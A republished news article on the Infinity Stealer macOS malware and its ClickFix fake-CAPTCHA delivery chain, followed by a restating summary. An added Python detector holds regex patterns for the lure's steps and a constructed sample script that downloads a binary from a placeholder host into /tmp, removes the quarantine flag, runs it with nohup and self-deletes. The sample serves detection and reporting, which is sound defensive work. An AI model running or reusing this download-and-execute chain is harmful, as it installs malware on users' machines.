LmCast :: Stay tuned in

New Infinity Stealer malware grabs macOS data via ClickFix lures

Recorded: March 28, 2026, 7 p.m.



New Infinity Stealer malware grabs macOS data via ClickFix lures

By Bill Toulas

March 28, 2026
10:35 AM

A new info-stealing malware named Infinity Stealer is targeting macOS systems with a Python payload packaged as an executable using the open-source Nuitka compiler.
The attack uses the ClickFix technique, presenting a fake CAPTCHA that mimics Cloudflare’s human verification check to trick users into executing malicious code.
Researchers at Malwarebytes say this is the first documented macOS campaign combining ClickFix delivery with a Python-based infostealer compiled using Nuitka.
Nuitka translates the Python script into C and compiles it into a native binary, so the resulting executable is more resistant to static analysis.
Unlike PyInstaller, which bundles the interpreter together with Python bytecode, a Nuitka build leaves no obvious bytecode layer to recover, making reverse engineering much harder.
“The final payload is written in Python and compiled with Nuitka, producing a native macOS binary. That makes it harder to analyze and detect than typical Python-based malware,” Malwarebytes says.
Attack chain
The attack begins with a ClickFix lure on the domain update-check[.]com, posing as a human verification step from Cloudflare and asking the user to complete the challenge by pasting a base64-obfuscated curl command into the macOS Terminal, bypassing OS-level defenses.

[Image: ClickFix step used in Infinity attacks. Source: Malwarebytes]
The command decodes a Bash script that writes stage 2 (the Nuitka loader) to /tmp, removes the quarantine flag, and launches it via ‘nohup’ so it keeps running after the Terminal session ends. It passes the command-and-control (C2) address and a token to the loader via environment variables, then deletes itself and closes the Terminal window.
The Nuitka loader is an 8.6 MB Mach-O binary that embeds a 35 MB zstd-compressed archive containing stage 3 (UpdateHelper.bin), the Infinity Stealer malware itself.

[Image: The malware's disassembly view. Source: Malwarebytes]
Before starting to collect sensitive data, the malware performs anti-analysis checks to determine whether it is running in a virtualized/sandboxed environment.
Malwarebytes’ analysis of the Python 3.11 payload uncovered that the info-stealer can take screenshots and harvest the following data:
Credentials from Chromium‑based browsers and Firefox
macOS Keychain entries
Cryptocurrency wallets
Plaintext secrets in developer files, such as .env
All stolen data is exfiltrated via HTTP POST requests to the C2, and a Telegram notification is sent to the threat actors upon completion of the operation.
Malwarebytes underlines that the appearance of malware like Infinity Stealer is proof that threats to macOS users are only getting more advanced and targeted.
Users should never paste commands they find online into Terminal unless they fully understand what those commands do.
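As an added example (not code from the article or from Malwarebytes), the checker below does what a careful user or an endpoint rule would do with a pasted command: it decodes any long base64 token the way the lure's own `base64 -d | bash` would, then looks across the command and the decoded layer for the stage-1 behaviours the article describes (decode piped to a shell, a curl download into /tmp, removal of com.apple.quarantine, nohup, self-deletion). The sample stage-1 script, the benign commands and the host example.invalid are constructed placeholders.

```python
import base64
import re

# Stage-1 behaviours described in the article, as regexes over a command line or a decoded payload.
INDICATORS = {
    "base64_decode_piped_to_shell": re.compile(r"base64\s+(?:-d|-D|--decode)\b[^|\n]*\|\s*(?:ba|z)?sh\b"),
    "curl_download": re.compile(r"\bcurl\b"),
    "drops_in_tmp": re.compile(r"/tmp/\S+"),
    "quarantine_flag_removed": re.compile(r"xattr\s+-[a-z]*d[a-z]*\s+com\.apple\.quarantine"),
    "nohup_background": re.compile(r"\bnohup\b"),
    "self_delete": re.compile(r'\brm\s+-f\s+"?\$0'),
}
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")  # only long base64-looking runs

def decode_embedded_base64(text):
    """Return UTF-8 text recovered from base64 tokens in `text` (one layer, as in the lure)."""
    decoded = []
    for token in B64_TOKEN.findall(text):
        try:
            candidate = base64.b64decode(token, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64, or a binary blob rather than a script
        if all(c.isprintable() or c in "\n\t" for c in candidate):
            decoded.append(candidate)
    return decoded

def analyze_command(command):
    """Names of indicators found in the command itself or in any payload it decodes."""
    hits = set()
    for layer in [command] + decode_embedded_base64(command):
        hits.update(name for name, pattern in INDICATORS.items() if pattern.search(layer))
    return hits

def is_clickfix_like(command, threshold=3):
    """One indicator (curl, a /tmp path) is routine; several together match the lure pattern."""
    return len(analyze_command(command)) >= threshold

# Constructed sample: a stage-1 script with the steps the article describes and a placeholder
# host (example.invalid), base64-encoded the way the fake CAPTCHA page presents it.
SAMPLE_STAGE1_SCRIPT = (
    "curl -fsSL https://example.invalid/stage2 -o /tmp/UpdateHelper\n"
    "xattr -d com.apple.quarantine /tmp/UpdateHelper\n"
    "C2=https://example.invalid TOKEN=placeholder nohup /tmp/UpdateHelper >/dev/null 2>&1 &\n"
    'rm -f "$0"\n'
)
SAMPLE_LURE_COMMAND = "echo " + base64.b64encode(SAMPLE_STAGE1_SCRIPT.encode()).decode() + " | base64 -d | bash"
BENIGN_COMMANDS = ["ls -la /tmp/build-output", "curl -fsSL https://example.invalid/README.md -o README.md"]
```

Running `is_clickfix_like` over each line of a shell history or a process-execution log turns this into a simple hunt; the threshold keeps ordinary curl or /tmp usage from firing on its own.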


Bill Toulas
Bill Toulas is a tech writer and infosec news reporter with over a decade of experience working on various online publications, covering open-source, Linux, malware, data breach incidents, and hacks.


Infinity Stealer represents a significant escalation in the macOS threat landscape: its attack chain is built around the ClickFix technique and its payload is compiled with the Nuitka compiler. According to Malwarebytes’ research, this is the first documented instance of ClickFix delivery combined with a Python-based infostealer compiled with Nuitka, a novel approach to macOS malware. The attack highlights the evolving tactics threat actors use to evade traditional security measures.

The attack begins with a deceptive lure on the update-check[.]com domain that mimics a Cloudflare CAPTCHA challenge and prompts the user to paste a base64-obfuscated curl command into the macOS Terminal. That command kicks off the sequence that runs the later stages of the malware. First, it decodes a Bash script that writes the stage-2 Nuitka loader to the /tmp directory, removes the quarantine flag, and executes it with 'nohup' so it keeps running even if the Terminal window is closed. Finally, the script passes the command-and-control (C2) server address and a token to the loader through environment variables, then deletes itself and closes the Terminal window.

The stage-2 component is an 8.6 MB Mach-O binary built with Nuitka, which compiles the Python script into a native executable and makes static analysis considerably more difficult. This binary carries a 35 MB zstd-compressed archive that unpacks into the stage-3 component, UpdateHelper.bin, which is the Infinity Stealer malware itself. Before collecting data, the malware performs an anti-analysis check for virtualization or sandboxing and adapts its behavior accordingly.

Once operational, the Infinity Stealer payload, written in Python 3.11, harvests data broadly: screenshots, macOS Keychain entries, cryptocurrency wallets, and plaintext secrets stored in developer files such as .env. Stolen data is exfiltrated over HTTP POST requests to the C2 server, and a Telegram notification is sent to the operators once collection succeeds. This pairing of immediate notification with data transit reflects the prompt follow-up typical of advanced attackers.

Malwarebytes’ analysis underscores the increasing sophistication of threats against macOS users. The use of Nuitka and the ClickFix technique demonstrates a commitment to covert malware development, making detection considerably more challenging for conventional security tools. This malware highlights the need for users to exercise extreme caution when interacting with unknown commands or links, particularly those delivered via seemingly legitimate verification mechanisms.

The attack signals a heightened and more targeted threat to macOS systems and suggests a more persistent approach by the group behind it. Users should stay alert and follow best practices to avoid falling victim to such campaigns.